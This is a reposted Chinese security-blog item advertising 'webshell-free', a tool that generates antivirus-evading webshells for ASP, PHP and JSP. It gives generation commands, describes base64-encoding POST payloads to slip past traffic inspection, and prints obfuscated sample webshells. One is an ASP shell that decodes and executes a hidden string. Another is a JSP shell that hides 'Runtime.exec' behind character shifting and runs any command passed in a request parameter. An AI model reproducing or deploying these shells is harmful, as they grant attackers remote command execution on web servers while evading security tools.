webshell免杀案例 -- webshell-free​
2023-2-6 00:3:4 Author: LemonSec(查看原文) 阅读量:21 收藏

0x01 工具介绍

webshell免杀案例。

0x02 安装与使用
1、ASP使方法
python3 asp-venom.py //生成python3 asp-venom.py > test.asp //保存
示例代码<%<!--Function Hsnh(Bjhu):Bjhu = Split(Bjhu,"|")For x=1 To Ubound(Bjhu)Hsnh=Hsnh&Chr(Bjhu(x)-31)NextEnd FunctionEXecutE(Hsnh("|132|149|128|139|63|145|132|144|148|132|146|147|71|65|152|153|131|131|140|145|85|65|72"))-->%>
2、PHP使用方法
python3 php_venom_3.3.py //生成免杀一句话python3 php_venom_3.3.py shell.php //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php
3.x 使用说明:是否传入id参数决定是否把流量编码http://www.xxx.com/shell.php POST: mr6=phpinfo();  //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
3、JSP使用方法
python3 jsp-venom.py //生成python3 jsp-venom.py > test.jsp //保存
生成样例<%@ page contentType="text/html;charset=UTF-8" language="java" %><%!public String vADM(String mPk){String BJM="";for (int i = 0; i < mPk.length(); i++) {BJM+=(char)(mPk.charAt(i)+-4);}return BJM;}%><% String sbd=request.getParameter("websafe");if(sbd!=null){ Class cjwV = Class.forName(vADM("neze2perk2Vyrxmqi")); Process rsSk = (Process) cjwV.getMethod(vADM("i|ig"), String.class).invoke(cjwV.getMethod(vADM("kixVyrxmqi")).invoke(null),sbd); java.io.InputStream in = rsSk.getInputStream();byte[] iLT = new byte[2048];out.print("<pre>");while(in.read(iLT)!=-1){ out.println(new String(iLT)); }out.print("</pre>"); }%>
0x03 下载地址

通过项目地址下载

项目地址:https://github.com/rexSurprise/webshell-free
侵权请私聊公众号删文

 热文推荐  

欢迎关注LemonSec
觉得不错点个“赞”、“在看“

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247540698&idx=1&sn=ebc8f8a0495e622546cb39e9e4520136&chksm=f9e33081ce94b997b037181cf819957e95b50d9acf158e646ab5c01ba8a967eada055bac1600#rd
如有侵权请联系:admin#unsafe.sh